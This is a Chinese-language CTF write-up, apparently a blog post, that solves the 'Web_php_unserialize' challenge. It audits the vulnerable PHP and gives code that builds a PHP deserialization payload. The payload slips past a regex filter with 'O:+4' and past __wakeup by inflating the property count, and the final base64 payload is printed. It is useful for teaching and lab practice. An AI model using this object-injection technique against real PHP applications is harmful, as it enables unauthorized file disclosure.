Web_php_unserialize

代码审计

php 复制代码
<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }、
//接收一个参数 $file 并赋值给私有属性 $file

    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
//在对象销毁时调用,使用 highlight_file 函数显示 $file 指定的文件内容

    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
//在反序列化时自动调用。如果 $file 不是 'index.php',则将其重置为 'index.php'

if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); //检查是否存在 $_GET['var'] 参数,如果存在,对其进行 Base64 解码
    if (preg_match('/[oc]:\d+:/i', $var)) { //使用 preg_match 检查解码后的字符串是否包含 PHP 对象的序列化标识,防止对象注入攻击
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); //显示index.php 文件内容
} 
?>

显示flag在fl4g.php里面

思路:在绕过干扰函数同时,var传参fl4g.php执行该代码的highlight_file函数

绕过base64_decode函数,进行base64编码

php 复制代码
<?php
// 构造一个对象,这个对象会被反序列化后,将 $file 设置为 'fl4g.php'
class Demo {
    private $file = 'index.php';

    public function __construct($file) {
        $this->file = $file;
    }

    public function __destruct() {
        echo @highlight_file($this->file, true);
    }

    public function __wakeup() {
        if ($this->file != 'index.php') {
            $this->file = 'fl4g.php';  // 这里直接设置 file 为 fl4g.php
        }
    }
}

// 构造一个合法的序列化对象字符串,并且 Base64 编码
$object = new Demo('evil.php');
$serialized = serialize($object);
$base64_encoded = base64_encode($serialized);

// 输出可以使用的 URL 参数
echo 'Payload: ' . urlencode($base64_encoded);
?>

选择构造一个合适的序列化对象的字符串不太行

参考了大佬的方法

在反序列化串的O:前加个加号"+",绕过

修改反序列化串的对象属性个数(一般大于原个数),绕过wakeup函数

php 复制代码
<?php
class Demo { 
    private $file = 'fl4g.php';
}
$a = serialize(new Demo);
$a = str_replace('O:4', 'O:+4',$a);       //绕过preg_match()函数
$a = str_replace(':1:', ':2:',$a);        //绕过__wakeup()函数
echo base64_encode($a);                   //绕过解码函数
?>

最后得到可以使用的base64编码:TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

构造payload拿到flag:

相关推荐
可乐鸡翅yeah_12 分钟前
HLS CORS 跨域问题完整排查实战,解决 M3U8 与 TS 分片跨域报错
android·ios·音视频·m3u8·音视频在线播放
Q一件事22 分钟前
ArcGIS中TypeError: can‘t multiply sequence by non-int of type ‘str‘错误
前端·javascript·arcgis
Ivanqhz39 分钟前
图是“拓扑 + 类型 + 形状“的世界
算法·决策树·机器学习·php·集成学习
美狐美颜SDK开放平台1 小时前
从视频处理到实时渲染:直播APP中视频美颜SDK的关键技术解析
前端·人工智能·架构·实时互动·音视频·视频美颜sdk
邪修king1 小时前
Linux系统篇(二十三) 基础 IO:从“文件”到“文件描述符”,彻底理解重定向
android·java·linux
WeiXin_DZbishe1 小时前
基于springboot大学生提问箱系统-计算机毕设【课程设计】72593
javascript·vue.js·spring boot·vscode·python·node.js·php
yume_sibai1 小时前
ES6 核心知识点完全总结(变量 + 箭头函数 + 解构 + Promise + 模块化)
前端·ecmascript·es6
灵境(虚幻知音)1 小时前
效能评估指标体系构建:方法、流程与模板
android·数据库
Moment1 小时前
为什么市面上的 coding agent 大多数都基于Nodejs?
前端·后端·面试
吃瓜的猹1 小时前
Gemini 3.8 Flash 是真的站起来了,一起来看看我到底做了什么吧~
前端